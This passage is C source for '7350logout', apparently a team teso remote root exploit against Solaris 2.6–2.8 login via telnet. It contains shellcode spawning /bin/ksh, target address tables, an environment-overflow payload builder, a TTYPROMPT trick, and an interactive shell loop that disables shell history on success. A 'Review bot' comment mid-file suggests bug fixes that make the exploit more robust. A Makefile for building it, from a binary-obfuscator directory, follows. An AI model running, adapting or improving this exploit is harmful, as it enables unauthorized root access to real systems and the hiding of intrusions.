109 "\x47" /* incl %edi */
110 "\xb0\x07" /* movb $0x7,%al */
111 "\xab" /* stosl %eax,%es:(%edi) */
112 "\xb0\x3b" /* movb $0x3b,%al */
113 "\xe8\xe0\xff\xff\xff" /* call */
114 "/bin/ksh";
115
116unsigned char x86_nop[] =
117 "\x90\x90\x90\x90"; /* TODO: replace with something innocent */
118
119
120#define SH_INIT "unset HISTFILE;id;uname -a;uptime;\n"
121
122
123tgt_type targets[] = {
124 { "Solaris 2.6|2.7|2.8 sparc", 0x00027600, 0,
125 sparc_solaris_execve, sizeof (sparc_solaris_execve) - 1,
126 sparc_nop },
127 { "Solaris 2.6|2.7|2.8 x86", /* .bss */ 0x0804f918 + 0x800, 1,
128 x86_solaris_execve, sizeof (x86_solaris_execve) - 1,
129 x86_nop },
130#if 0
131/* solaris 2.4 uses libauth, a libpam precessor, which looks different.
132 * i suppose it would be possible to make this technique work with libauth,
133 * but its not worth the effort (though they look very similar)
134 { "Solaris 2.4 SPARC", 0x00026e78,
135 sparc_solaris_execve, sizeof (sparc_solaris_execve) - 1 },
136*/
137 { "Solaris 2.6 SPARC", 0x00027620,
138 sparc_solaris_execve, sizeof (sparc_solaris_execve) - 1 },
139 { "Solaris 2.7|2.8 SPARC", 0x000275c0,
140 sparc_solaris_execve, sizeof (sparc_solaris_execve) - 1 },
141#endif
142 { NULL, 0x00000000, 0, NULL, 0, NULL },
143};
144
145tgt_type target_manual_sparc = {
146 "Manual target sparc", 0x0, 0,
147 sparc_solaris_execve, sizeof (sparc_solaris_execve) - 1,
148 sparc_nop
149};
150
151tgt_type target_manual_x86 = {
152 "Manual target x86", 0x0, 0,
153 x86_solaris_execve, sizeof (x86_solaris_execve) - 1,
154 x86_nop
155};
156
157unsigned char manual_type;
158unsigned long int manual_args = 0x0;
159
160char * dest = "127.0.0.1"; /* can be changed with -d */
161int xp_final = 0,
162 verbose = 0,
163 debug = 0,
164 ttyp = 0; /* force "TTYPROMPT" environment */
165
166
167/* prototypes
168 */
169
170void usage (char *progname);
171void shell (int sock);
172void hexdump (char *desc, unsigned char *data, unsigned int amount);
173void exploit (int fd);
174void exploit_setenv (int fd, unsigned char *var, unsigned char *val);
175unsigned int exploit_pam (unsigned char *ww);
176unsigned int exploit_nopscode (unsigned char *ww, unsigned long playsize);
177unsigned int exploit_addstring (unsigned char *ww, unsigned char *str);
178unsigned int exploit_addbuf (unsigned char *ww, unsigned char *buf,
179 unsigned int buf_len);
180unsigned int exploit_addbufquot (unsigned char *ww, unsigned char *buf,
181 unsigned int buf_len);
182unsigned int exploit_addchars (unsigned char *ww, unsigned char wc,
183 unsigned int count);
184unsigned int exploit_addraw (unsigned char *ww, unsigned char wc);
185unsigned int exploit_addchar (unsigned char *ww, unsigned char wc);
186unsigned int exploit_addptrs (unsigned char *ww, unsigned long int ptr,
187 unsigned int count);
188unsigned int exploit_addptr (unsigned char *ww, unsigned long int ptr);
189ssize_t telnet_prompt (int fd, unsigned char *inbuf, unsigned int inbufsize,
190 char *prompt);
191unsigned char * binstrstr (unsigned char *binary, unsigned int bin_len,
192 unsigned char *str);
193ssize_t telnet_read (int fd, unsigned char *inbuf, unsigned int inbufsize);
194int telnet_eatall (int fd, unsigned char *inbuf, unsigned int inbuf_len);
195void telnet_send (int fd, unsigned char type, unsigned char option);
196void tgt_list (void);
197unsigned long int net_resolve (char *host);
198int net_connect (struct sockaddr_in *cs, char *server,
199 unsigned short int port, int sec);
200int net_rtimeout (int fd, int sec);
201int nwrite (int fd, unsigned char *ptr, unsigned int len);
202
203
204
205void
206usage (char *progname)
207{
208 fprintf (stderr, "usage: %s [-h] [-v] [-D] [-T] [-p] [-t num] [-a addr] "
209 "[-d dst]\n\n", progname);
210
211 fprintf (stderr, "-h\tdisplay this usage\n"
212 "-v\tincrease verbosity\n"
213 "-D\tDEBUG mode\n"
214 "-T\tTTYPROMPT mode (try when normal mode fails)\n"
215 "-p\tspawn ttyloop directly (use when problem arise)\n"
216 "-t num\tselect target type (zero for list)\n"
217 "-a a\tacp option: set &args[0]. format: \"[sx]:0x123\"\n"
218 "\t(manual offset, try 0x26500-0x28500, "
219 "in 0x600 steps)\n"
220 "-d dst\tdestination ip or fqhn (default: 127.0.0.1)\n\n");
221
222 exit (EXIT_FAILURE);
223}
224
225
226int fastprompt = 0;
227tgt_type * tgt = NULL;
228
229int
230main (int argc, char *argv[])
231{
232 int fd,
233 tgt_num = -1;
234 char c;
235 char * progname;
236 unsigned char rbuf[4096];
237
238
239#ifndef NOTAG
240 fprintf (stderr, "7350logout - sparc|x86/solaris login remote root "
241 "(version "VERSION") -sc.\n"
242 "team teso.\n\n");
243#endif
244
245 progname = argv[0];
246 if (argc < 2)
247 usage (progname);
248
249
250 while ((c = getopt (argc, argv, "ht:vDTpa:d:")) != EOF) {
251 switch (c) {
252 case 'h':
253 usage (progname);
254 break;
255 case 't':
256 if (sscanf (optarg, "%u", &tgt_num) != 1)
257 usage (progname);
258 break;
259 case 'v':
260 verbose += 1;
261 break;
262 case 'T':
263 ttyp = 1;
264 break;
265 case 'D':
266 debug = 1;
267 break;
268 case 'p':
269 fastprompt = 1;
270 break;
271 case 'a':
272 if (sscanf (optarg, "%c:0x%lx", &manual_type,
273 &manual_args) != 1)
274 {
275 fprintf (stderr, "give args address in [sx]:0x123 "
276 "format, dumb pentester!\n");
277 exit (EXIT_FAILURE);
278 }
279 break;
280 case 'd':
281 dest = optarg;
282 break;
283 default:
284 usage (progname);
285 break;
286 }
287 }
288
289 if (manual_args != 0) {
290 if (manual_type == 's') {
291 tgt = &target_manual_sparc;
292 } else if (manual_type == 'x') {
293 tgt = &target_manual_x86;
294 } else {
295 fprintf (stderr, "invalid [sx] manual target\n");
296 exit (EXIT_FAILURE);
297 }
298
299 tgt->args = manual_args;
300 } else if (tgt_num <= 0 ||
301 (tgt_num >= (sizeof (targets) / sizeof (tgt_type))))
302 {
303 if (tgt_num != 0)
304 printf ("WARNING: target out of list. list:\n\n");
305
306 tgt_list ();
307
308 exit (EXIT_SUCCESS);
309 } else if (tgt == NULL)
310 tgt = &targets[tgt_num - 1];
311
312 fprintf (stderr, "# using target: %s\n", tgt->desc);
313
314 fd = net_connect (NULL, dest, 23, 20);
315 if (fd <= 0) {
316 fprintf (stderr, "failed to connect\n");
317 exit (EXIT_FAILURE);
318 }
319
320 if (ttyp) {
321 fprintf (stderr, "# setting TTYPROMPT\n");
322 exploit_setenv (fd, "TTYPROMPT", "gera");
323 }
324
325 /* catch initial telnet option processing, then wait for "login: "
326 * prompt to appear
327 */
328 telnet_prompt (fd, rbuf, sizeof (rbuf), "login: ");
329 fprintf (stderr, "# detected first login prompt\n");
330
331 /* send one initial login attempt (to set pamh)
332 */
333 write (fd, "foo 7350\n", 9);
334 sleep (1);
335 write (fd, "pass\n", 5);
336 sleep (1);
337
338 telnet_prompt (fd, rbuf, sizeof (rbuf), "login: ");
339 fprintf (stderr, "# detected second login prompt\n");
340
341 if (debug) {
342 fprintf (stderr, "### attach and press enter!\n");
343 getchar ();
344 }
345 exploit (fd);
346 fprintf (stderr,
347 "# send long login bait, waiting for password prompt\n");
348 xp_final = 1;
349
350 if (fastprompt || debug) {
351 fprintf (stderr, "# press enter at the prompt\n");
352 } else {
353 telnet_prompt (fd, rbuf, sizeof (rbuf), "Password: ");
354 fprintf (stderr, "# received password prompt, success?\n");
355 write (fd, "7350\n", 5);
356
357 fprintf (stderr, "# waiting for shell "
358 "(more than 15s hanging = failure)\n");
359 telnet_prompt (fd, rbuf, sizeof (rbuf), "#");
360
361 fprintf (stderr,
362 "# detected shell prompt, successful exploitation\n");
363 fprintf (stderr, "###########################################"
364 "################################\n");
365
366 write (fd, SH_INIT, strlen (SH_INIT));
367 }
368
369 shell (fd);
370
371 exit (EXIT_SUCCESS);
372}
373
374
375unsigned int envcount;
376#define MAXARGS 63
377
378void
379exploit (int fd)
380{
381 int n;
382 unsigned char * ww; /* wbuf walker */
383 unsigned char wbuf[16384];
384 unsigned long retaddr; /* where to return to */
385 unsigned long padenv;
386
387
388 envcount = 0;
389 memset (wbuf, '\x00', sizeof (wbuf));
390 ww = &wbuf[0];
391
392 /* login name
393 */
394 ww += exploit_addstring (ww, "sP!");
395 ww += exploit_addraw (ww, '\x20');
396
397 /* 1. env: with return address
398 * retaddr is exact known middle of envbuf for given target,
399 * so it will most likely be correct for unknown targets, too.
400 * we have a total of 0x680(-1) bytes of playground.
401 */
402 retaddr = tgt->args - 0x0800 + (64 * 2) + 0x340
403 - 24 ; /* - 24 = shellcode_len / 2, padded up to next %4=0 */
404
405 fprintf (stderr, "# returning into 0x%08lx\n", retaddr);
406 if (debug)
407 ww += exploit_addptr (ww, 0x41414140);
408 else
409 ww += exploit_addptr (ww, retaddr);
410 ww += exploit_addraw (ww, '\x20');
411
412 /* 2. - 61. env just bogus data.
413 * TODO: maybe find a valid 0x00mm00mm opcode so this is real
414 * nopspace, too.
415 *
416 * - 1 = login name
417 * - 1 = retaddr data
418 * - 1 = pad
419 */
420 for (n = 0 ; n < MAXARGS - 1 - 1 - 1 ; ++n) {
421 ww += exploit_addchar (ww, 'a');
422 ww += exploit_addraw (ww, '\x20');
423 }
424
425 /* %4=0 padding before nops + shellcode
426 */
427 padenv = 4 - (envcount % 4);
428 ww += exploit_addchars (ww, 'P', padenv);
429
430 /* 63. nopspace + shellcode, padding before
431 */
432 padenv = 0x700 - envcount; /* real bytes */
433 padenv -= 1; /* minus terminating NUL char */
434 if (verbose > 2) {
435 fprintf (stderr, "envcount = %d (0x%x)\n", envcount, envcount);
436 fprintf (stderr, "padding with %ld (0x%lx) chars\n",
437 padenv, padenv);
438 }
439
440 if (debug)
441 ww += exploit_addchars (ww, '7', padenv);
442 else
443 ww += exploit_nopscode (ww, padenv);
444
445 ww += exploit_addraw (ww, '\x20');
446
447
448 /* 64. pamh, minimal survive-header, then NUL padding
449 * align so that pameptr is the 65'th pointer, yay!
450 */
451 ww += exploit_pam (ww);
452 padenv = 0x7e8 + 4 - envcount;
453 padenv -= 1;
454 ww += exploit_addchars (ww, '\x00', padenv);
455 ww += exploit_addraw (ww, '\x20');
456
457 /* 65. pameptr
458 */
459 ww += exploit_addstring (ww, "7350");
460
461 *ww++ = '\n';
462
463 n = ww - &wbuf[0];
464
465 if (verbose >= 2)
466 hexdump ("WIRE-BUFFER", wbuf, n);
467
468 nwrite (fd, wbuf, n);
469}
470
471/* 854! ;)
472 */
473void
474exploit_setenv (int fd, unsigned char *var, unsigned char *val)
475{
476 int n = 0;
477 unsigned char buf[2048];
478
479 buf[n++] = IAC;
480 buf[n++] = SB;
481 buf[n++] = TELOPT_NEW_ENVIRON;
482 buf[n++] = TELQUAL_IS;
483 buf[n++] = ENV_USERVAR;
484
485 /* should not contain < 0x04 */
486 while (*var) {
487 if (*var == IAC)
488 buf[n++] = *var;
489 buf[n++] = *var++;
490 }
491 buf[n++] = NEW_ENV_VALUE;
492 while (*val) {
493 if (*val == IAC)
494 buf[n++] = *val;
495 buf[n++] = *val++;
496 }
497 buf[n++] = IAC;
498 buf[n++] = SE;
499
500 if (send (fd, buf, n, 0) != n) {
501 perror ("xp_setenv:send");
502 exit (EXIT_FAILURE);
503 }
504}
505
506
507#define PAM_USER 2
508#define PAM_MAX_ITEMS 64
509
510unsigned int
511exploit_pam (unsigned char *ww)
512{
513 unsigned int n;
514 unsigned char * wwo = ww;
515 unsigned long no_nul_addr;
516
517
518 /* we need to set pam_user to a string != "\0" (else we have some
519 * side effects in the malloc functions/strdup, don't ask). hence we
520 * use the same address as we used for retaddr, as there is no NUL
521 * byte for sure.
522 */
523 no_nul_addr = tgt->args - 0x0800 + (64 * 2) + 0x340
524 - 24 ; /* - 24 = shellcode_len / 2, padded up to next %4=0 */
525
526 /* add pam_item ps_item[PAM_MAX_ITEMS] structures */
527 for (n = 0 ; n < PAM_USER + 1 ; ++n) {
528 if (n == PAM_USER) {
529 ww += exploit_addptr (ww, no_nul_addr);
530 ww += exploit_addptr (ww, 0x00000001);
531 } else {
532 ww += exploit_addchars (ww, '\x00', 8);
533 }
534 }
535
536 return (ww - wwo);
537}
538
539
540/* exploit_nopscode
541 *
542 * create a nop + shellcode space of `playsize' bytes in raw length.
543 * then encode buffer to `ww'. the output buffer must have the size
544 * of `playsize', so padding is our duty (not the space though).
545 *
546 * return length of encoded output (can be larger than playsize)
547 */
548
549unsigned int
550exploit_nopscode (unsigned char *ww, unsigned long playsize)
551{
552 unsigned int scw; /* shellcode walker */
553 unsigned char * wwo = ww;
554 unsigned char * cbuf = calloc (1, playsize);
555 unsigned long int sizepad = playsize & ~3;
556
557
558 /* what we do not overwrite is padding
559 */
560 memset (cbuf, 'P', playsize);
561 if (sizepad < tgt->shellcode_len) {
562 fprintf (stderr, "no room to store shellcode (%lu bytes "
563 "given, %u needed)\n", sizepad, tgt->shellcode_len);
564
565 exit (EXIT_FAILURE);
566 }
567 sizepad -= tgt->shellcode_len;
568
569 for (scw = 0 ; scw < sizepad ; scw += 4)
570 memcpy (&cbuf[scw], tgt->shellcode_nop, 4);
571 memcpy (&cbuf[sizepad], tgt->shellcode, tgt->shellcode_len);
572
573 /* encode to output
574 */
575 ww += exploit_addbuf (ww, cbuf, playsize);
576
577 if (verbose >= 2)
578 hexdump ("CODE-BUFFER", cbuf, playsize);
579
580 free (cbuf);
581
582 return (ww - wwo);
583}
584
585
586unsigned int
587exploit_addstring (unsigned char *ww, unsigned char *str)
588{
589 unsigned char * wwo = ww;
590
591 ww += exploit_addbuf (ww, str, strlen (str));
592
593 return (ww - wwo);
594}
595
596
597unsigned int
598exploit_addbuf (unsigned char *ww, unsigned char *buf, unsigned int buf_len)
599{
600 unsigned char * wwo = ww;
601
602 for ( ; buf_len > 0 ; ++buf, --buf_len)
603 ww += exploit_addchar (ww, *buf);
604
605 return (ww - wwo);
606}
607
608
609unsigned int
610exploit_addbufquot (unsigned char *ww, unsigned char *buf,
611 unsigned int buf_len)
612{
613 unsigned char wc;
614 unsigned char * wwo;
615
616 for (wwo = ww ; buf_len > 0 ; --buf_len, ++buf) {
617 wc = *buf;
618
619 *ww++ = '\\';
620 *ww++ = ((wc & 0300) >> 6) + '0';
621 *ww++ = ((wc & 0070) >> 3) + '0';
622 *ww++ = (wc & 0007) + '0';
623 envcount += 1;
624 }
625
626 return (ww - wwo);
627}
628
629
630unsigned int
631exploit_addchars (unsigned char *ww, unsigned char wc, unsigned int count)
632{
633 unsigned char * wwo;
634
635 for (wwo = ww ; count > 0 ; --count) {
636 ww += exploit_addchar (ww, wc);
637 }
638
639 return (ww - wwo);
640}
641
642
643unsigned int
644exploit_addraw (unsigned char *ww, unsigned char wc)
645{
646 if (wc == '\x20' || *ww == '\x09')
647 envcount += 1;
648
649 *ww = wc;
650
651 return (1);
652}
653
654
655unsigned int
656exploit_addchar (unsigned char *ww, unsigned char wc)
657{
658 unsigned char * wwo = ww;
659
660 switch (wc) {
661 case ('\\'):
662 *ww++ = '\\';
663 *ww++ = '\\';
664 break;
665 case (0xff):
666 case ('\n'):
667 case (' '):
668 case ('\t'):
669 *ww++ = '\\';
670 *ww++ = ((wc & 0300) >> 6) + '0';
671 *ww++ = ((wc & 0070) >> 3) + '0';
672 *ww++ = (wc & 0007) + '0';
673 break;
674 default:
675 *ww++ = wc;
676 break;
677 }
678
679 envcount += 1;
680
681 return (ww - wwo);
682}
683
684
685unsigned int
686exploit_addptrs (unsigned char *ww, unsigned long int ptr, unsigned int count)
687{
688 unsigned char * wwo;
689
690 for (wwo = ww ; count > 0 ; --count) {
691 ww += exploit_addptr (ww, ptr);
692 }
693
694 return (ww - wwo);
695}
696
697
698unsigned int
699exploit_addptr (unsigned char *ww, unsigned long int ptr)
700{
701 unsigned char * wwo = ww;
702
703 if (tgt->endianess == 0) {
704 /* big endian */
705 ww += exploit_addchar (ww, (ptr >> 24) & 0xff);
706 ww += exploit_addchar (ww, (ptr >> 16) & 0xff);
707 ww += exploit_addchar (ww, (ptr >> 8) & 0xff);
708 ww += exploit_addchar (ww, ptr & 0xff);
709 } else if (tgt->endianess == 1) {
710 /* little endian */
711 ww += exploit_addchar (ww, ptr & 0xff);
712 ww += exploit_addchar (ww, (ptr >> 8) & 0xff);
713 ww += exploit_addchar (ww, (ptr >> 16) & 0xff);
714 ww += exploit_addchar (ww, (ptr >> 24) & 0xff);
715 }
716
717 return (ww - wwo);
718}
719
720
721/* telnet_prompt
722 *
723 * loop in telnet i/o until a prompt appears, given by `prompt' parameter
724 * else behave as telnet_read would
725 */
726
727ssize_t
728telnet_prompt (int fd, unsigned char *inbuf, unsigned int inbufsize,
729 char *prompt)
730{
731 ssize_t rtemp;
732
733
734 do {
735 rtemp = telnet_read (fd, inbuf, inbufsize);
736 if (rtemp == 0) {
737 if (xp_final == 0) {
738 fprintf (stderr, "failed telnet_prompt.\n");
739 } else {
740 fprintf (stderr, "\nfailed exploitation. possible causes:\n"
741 "# 1. login patched\n"
742 "# 2. wrong target type (sparc|x86)\n"
743 "# 3. weird/no solaris version <= 2.4\n"
744 "# 4. TTYPROMPT weirdness, try again with -T option\n"
745 "# 5. try with -p -v options\n\n"
746 "good luck.\n");
747 }
748
749 exit (EXIT_FAILURE);
750 }
751
752 if (verbose >= 2) {
753 fprintf (stderr, "rbuf: ");
754 write (2, inbuf, rtemp);
755 }
756 } while (ttyp == 0 && binstrstr (inbuf, rtemp, prompt) == NULL);
757
758 return (rtemp);
759}
760
761
762unsigned char *
763binstrstr (unsigned char *binary, unsigned int bin_len, unsigned char *str)
764{
765 if (bin_len < strlen (str))
766 return (NULL);
767
768 while (binary <= (binary + bin_len - strlen (str))) {
769 if (memcmp (binary, str, strlen (str)) == 0)
770 return (binary);
771
772 binary += 1;
773 bin_len -= 1;
774 }
775
776 return (NULL);
777}
778
779
780/* telnet_read
781 *
782 * read() function that takes care of all the telnet option negotiation crap
783 *
784 * return value just like read()
785 */
786
787ssize_t
788telnet_read (int fd, unsigned char *inbuf, unsigned int inbufsize)
789{
790 ssize_t rc = 1;
791 int idleflag,
792 atecount = 1;
793
794
795 while (atecount != 0 && (idleflag = net_rtimeout (fd, 15)) == 1) {
796 rc = read (fd, inbuf, inbufsize);
797 if (verbose && rc > 0)
798 hexdump ("from wire", inbuf, rc);
799 atecount = telnet_eatall (fd, inbuf, rc);
800 rc -= atecount;
801 if (verbose && rc > 0)
802 hexdump ("after processing", inbuf, rc);
803 if (rc > 0)
804 return (rc);
805 }
806
807 fprintf (stderr, "# telnetd either died or invalid response\n");
808
809 return (rc);
810}
811
812
813/* telnet_eatall
814 *
815 * eat all telnet negotiation stuff and answer it, so we get through.
816 * basically copied 1:1 from netcat.
817 */
818
819int
820telnet_eatall (int fd, unsigned char *inbuf, unsigned int inbuf_len)
821{
822 int eat;
823 int changed;
824
825
826 for (eat = 0 ; inbuf_len > 2 ; ++inbuf, --inbuf_len) {
827 changed = 0;
828
829 if (inbuf[0] != IAC || inbuf_len < 2)
830 continue;
831
832 if (inbuf[1] == WILL && inbuf[2] == TELOPT_SGA) {
833 inbuf[1] = DO; /* IAC WILL SUPPRESSGOAHEAD, DO IT! */
834 changed = 1;
835 } else if (inbuf[1] == WILL && inbuf[2] == TELOPT_ECHO) {
836 inbuf[1] = DO; /* IAC WILL ECHO, DO IT! */
837 changed = 1;
838 } else
839 if (inbuf[1] == WILL || inbuf[1] == WONT) {
840 inbuf[1] = DONT;
841 changed = 1;
842 } else if (inbuf[1] == DO || inbuf[1] == DONT) {
843 inbuf[1] = WONT;
844 changed = 1;
845 }
846 if (changed)
847 write (fd, inbuf, 3);
848
849 if (inbuf_len > 3)
850 memmove (&inbuf[0], &inbuf[3], inbuf_len - 3);
851
852 --inbuf;
853 inbuf_len -= 2;
854 eat += 3;
855 }
856
857 return (eat);
858}
859
860
861void
862telnet_send (int fd, unsigned char type, unsigned char option)
863{
864 unsigned char buf[3];
865
866 buf[0] = IAC;
867 buf[1] = type;
868 buf[2] = option;
869
870 write (fd, buf, sizeof (buf));
871}
872
873
874void
875tgt_list (void)
876{
877 int tgt_num;
878
879
880 printf ("num . description\n");
881 printf ("----+-----------------------------------------------"
882 "--------\n");
883
884 for (tgt_num = 0 ; targets[tgt_num].desc != NULL ; ++tgt_num) {
885 printf ("%3d | %s\n", tgt_num + 1, targets[tgt_num].desc);
886
887 if (verbose)
888 printf (" : 0x%08lx\n", targets[tgt_num].args);
889 }
890 printf (" '\n");
891
892 return;
893}
894
895
896void
897shell (int sock)
898{
899 int l;
900 char buf[512];
901 fd_set rfds;
902
903
904 while (1) {
905 FD_SET (0, &rfds);
906 FD_SET (sock, &rfds);
907
908 select (sock + 1, &rfds, NULL, NULL, NULL);
909 if (FD_ISSET (0, &rfds)) {
910 l = read (0, buf, sizeof (buf));
911 if (l <= 0) {
912 perror ("read user");
913 exit (EXIT_FAILURE);
914 }
915 write (sock, buf, l);
916 }
917
918 if (FD_ISSET (sock, &rfds)) {
919 l = telnet_read (sock, buf, sizeof (buf));
920 if (l <= 0) {
921 perror ("read remote");
922 exit (EXIT_FAILURE);
923 }
924 write (1, buf, l);
925 }
926 }
927}
928
929
930/* ripped from zodiac */
931void
932hexdump (char *desc, unsigned char *data, unsigned int amount)
933{
934 unsigned int dp, p; /* data pointer */
935 const char trans[] =
936 "................................ !\"#$%&'()*+,-./0123456789"
937 ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
938 "nopqrstuvwxyz{|}~...................................."
939 "....................................................."
940 "........................................";
941
942
943 printf ("/* %s, %u bytes */\n", desc, amount);
944
945 for (dp = 1; dp <= amount; dp++) {
946 fprintf (stderr, "%02x ", data[dp-1]);
947 if ((dp % 8) == 0)
948 fprintf (stderr, " ");
949 if ((dp % 16) == 0) {
950 fprintf (stderr, "| ");
951 p = dp;
952 for (dp -= 16; dp < p; dp++)
953 fprintf (stderr, "%c", trans[data[dp]]);
954 fflush (stderr);
955 fprintf (stderr, "\n");
956 }
957 fflush (stderr);
958 }
959 if ((amount % 16) != 0) {
960 p = dp = 16 - (amount % 16);
961 for (dp = p; dp > 0; dp--) {
962 fprintf (stderr, " ");
963 if (((dp % 8) == 0) && (p != 8))
964 fprintf (stderr, " ");
965 fflush (stderr);
966 }
967 fprintf (stderr, " | ");
968 for (dp = (amount - (16 - p)); dp < amount; dp++)
969 fprintf (stderr, "%c", trans[data[dp]]);
970 fflush (stderr);
971 }
972 fprintf (stderr, "\n");
973
974 return;
975}
976
977
978
979unsigned long int
980net_resolve (char *host)
981{
982 long i;
983 struct hostent *he;
984
985 i = inet_addr(host);
986 if (i == -1) {
987 he = gethostbyname(host);
988 if (he == NULL) {
989 return (0);
990 } else {
991 return (*(unsigned long *) he->h_addr);
992 }
993 }
994 return (i);
995}
996
997
998int
999net_connect (struct sockaddr_in *cs, char *server,
1000 unsigned short int port, int sec)
1001{
1002 int n,
1003 len,
1004 error,
1005 flags;
1006 int fd;
1007 struct timeval tv;
1008 fd_set rset, wset;
1009 struct sockaddr_in csa;
1010
1011 if (cs == NULL)
1012 cs = &csa;
1013
1014 /* first allocate a socket */
1015 cs->sin_family = AF_INET;
1016 cs->sin_port = htons (port);
1017 fd = socket (cs->sin_family, SOCK_STREAM, 0);
1018 if (fd == -1)
1019 return (-1);
1020
1021 if (!(cs->sin_addr.s_addr = net_resolve (server))) {
1022 close (fd);
1023 return (-1);
1024 }
1025
1026 flags = fcntl (fd, F_GETFL, 0);
1027 if (flags == -1) {
1028 close (fd);
1029 return (-1);
1030 }
1031 n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
1032 if (n == -1) {
1033 close (fd);
1034 return (-1);
1035 }
1036
1037 error = 0;
1038
1039 n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
1040 if (n < 0) {
1041 if (errno != EINPROGRESS) {
1042 close (fd);
1043 return (-1);
1044 }
1045 }
1046 if (n == 0)
1047 goto done;
1048
1049 FD_ZERO(&rset);
1050 FD_ZERO(&wset);
1051 FD_SET(fd, &rset);
1052 FD_SET(fd, &wset);
1053 tv.tv_sec = sec;
1054 tv.tv_usec = 0;
1055
1056 n = select(fd + 1, &rset, &wset, NULL, &tv);
1057 if (n == 0) {
1058 close(fd);
1059 errno = ETIMEDOUT;
1060 return (-1);
1061 }
1062 if (n == -1)
1063 return (-1);
1064
1065 if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
1066 if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
1067 len = sizeof(error);
1068 if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
1069 errno = ETIMEDOUT;
1070 return (-1);
1071 }
1072 if (error == 0) {
1073 goto done;
1074 } else {
1075 errno = error;
1076 return (-1);
1077 }
1078 }
1079 } else
1080 return (-1);
1081
1082done:
1083 n = fcntl(fd, F_SETFL, flags);
1084 if (n == -1)
1085 return (-1);
1086 return (fd);
1087}
1088
1089
1090int
1091net_rtimeout (int fd, int sec)
1092{
1093 fd_set rset;
1094 struct timeval tv;
1095 int n, error, flags;
1096
1097 error = 0;
1098 flags = fcntl(fd, F_GETFL, 0);
1099 n = fcntl(fd, F_SETFL, flags | O_NONBLOCK);
1100 if (n == -1)
1101 return (-1);
1102
1103 FD_ZERO(&rset);
1104 FD_SET(fd, &rset);
1105 tv.tv_sec = sec;
1106 tv.tv_usec = 0;
1107
1108 /* now we wait until more data is received then the tcp low level watermark,
1109 * which should be setted to 1 in this case (1 is default)
1110 */
1111
1112 n = select(fd + 1, &rset, NULL, NULL, &tv);
1113 if (n == 0) {
1114 n = fcntl(fd, F_SETFL, flags);
1115 if (n == -1)
1116 return (-1);
1117 errno = ETIMEDOUT;
1118 return (-1);
1119 }
1120 if (n == -1) {
1121 return (-1);
1122 }
1123 /* socket readable ? */
1124 if (FD_ISSET(fd, &rset)) {
1125 n = fcntl(fd, F_SETFL, flags);
1126 if (n == -1)
1127 return (-1);
1128 return (1);
1129 } else {
1130 n = fcntl(fd, F_SETFL, flags);
1131 if (n == -1)
1132 return (-1);
1133 errno = ETIMEDOUT;
1134 return (-1);
1135 }
1136}
1137
1138
1139int
1140nwrite (int fd, unsigned char *ptr, unsigned int len)
1141{
1142 ssize_t retval,
1143 nwr = 0;
1144 int ff_count,
1145 pw, tw;
1146 unsigned char * sbuf;
1147
1148
1149 for (ff_count = 0, sbuf = ptr ; sbuf < &ptr[len] ; ++sbuf)
1150 if (*sbuf == 0xff)
1151 ff_count++;
1152
1153 sbuf = malloc (len + ff_count);
1154 for (pw = tw = 0 ; pw < len ; ++pw, ++tw) {
1155 sbuf[tw] = ptr[pw];
1156 if (ptr[pw] == 0xff)
1157 sbuf[++tw] = ptr[pw];
1158 }
1159 ptr = sbuf;
1160 len = tw;
1161
1162 if (verbose)
1163 hexdump ("to wire", ptr, len);
1164
1165 while (len > 0) {
1166 telnet_send (fd, WONT, TELOPT_BINARY);
1167 telnet_send (fd, WILL, TELOPT_BINARY);
1168 fprintf (stderr, "#");
1169 usleep (1000000);
1170
1171 retval = write (fd, ptr, len > 0x100 ? 0x100 : len);
1172 if (retval <= 0)
1173 return (retval);
1174 if (verbose >= 2) {
1175 fprintf (stderr, "first,second: %02x %02x "
1176 "2last,last: %02x %02x\n",
1177 ptr[0], ptr[1],
1178 ptr[retval - 2], ptr[retval - 1]);
1179 }
1180
1181 ptr += retval;
1182 len -= retval;
1183 nwr += retval;
1184 }
1185
1186 fprintf (stderr, "\n");
1187 return (nwr);
1188}
1189
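Review bot: In `telnet_read`, the result of `read ()` is passed to `telnet_eatall` before it is checked, and `telnet_eatall` takes the length as `unsigned int`, so a failed read (`rc == -1`) becomes a length of `UINT_MAX` and the scan and `memmove` run past the end of the caller's buffer. Add `if (rc <= 0) break;` directly after the `read` call, which still reaches the existing error message and `return (rc);`. `binstrstr` has a related problem: its loop test `binary <= (binary + bin_len - strlen (str))` only ends once the unsigned subtraction wraps, which relies on pointer overflow, whereas `while (bin_len >= strlen (str))` states the intended bound. Both functions parse bytes supplied by the remote peer, so their bounds should not depend on that data or on the read succeeding.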
diff --git a/other/burneye2/tmp/logout/7350logout.o b/other/burneye2/tmp/logout/7350logout.o
new file mode 100644
index 0000000..f974541
--- /dev/null
+++ b/other/burneye2/tmp/logout/7350logout.o
Binary files differ
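diff --git a/other/burneye2/tmp/logout/Makefile b/other/burneye2/tmp/logout/Makefile
new file mode 100644
index 0000000..9c93d0d
--- /dev/null
+++ b/other/burneye2/tmp/logout/Makefile
@@ -0,0 +1,30 @@
+
+CC=gcc
+CFLAGS=-Os -nostdlib
+
+# 1. order of start.o important, -L/-l does not matter
+LIBS_DIET=/usr/lib/diet/lib-i386/start.o \
+ -L/usr/lib/diet/lib-i386 -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc
+DIET_INCLUDE=-I/usr/include/diet
+
+# gcc --help -v 2>&1 |grep crt
+LIBS_GLIBC=/usr/lib/crt1.o /usr/lib/crti.o /usr/lib/gcc-lib/i386-linux/2.95.4/crtbegin.o \
+ -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc \
+ /usr/lib/gcc-lib/i386-linux/2.95.4/crtend.o /usr/lib/crtn.o
+
+all: 7350logout
+
+clean:
+ rm -f *.o 7350logout-glibc 7350logout-dietlibc
+
+7350logout: 7350logout-final-dietlibc.o 7350logout-final-glibc.o
+ ld -o 7350logout-dietlibc 7350logout-final-dietlibc.o
+ ld -o 7350logout-glibc 7350logout-final-glibc.o
+
+7350logout-final-dietlibc.o: 7350logout.c
+ $(CC) $(DIET_INCLUDE) $(CFLAGS) -c -o 7350logout.o 7350logout.c
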